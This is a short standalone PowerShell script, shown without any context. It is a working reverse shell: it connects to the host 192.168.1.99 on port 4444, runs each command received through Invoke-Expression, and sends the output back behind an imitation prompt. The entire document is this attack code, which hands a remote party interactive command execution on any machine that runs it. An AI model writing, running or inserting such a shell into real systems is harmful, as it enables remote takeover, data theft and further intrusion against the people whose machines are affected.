$client = New-Object System.Net.Sockets.TCPClient("192.168.1.99", 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $bytes2 = (New-Object -TypeName System.Text.ASCIIEncoding).GetBytes($sendback2);
    $stream.Write($bytes2, 0, $bytes2.Length);
    $stream.Flush();
}
$client.Close();
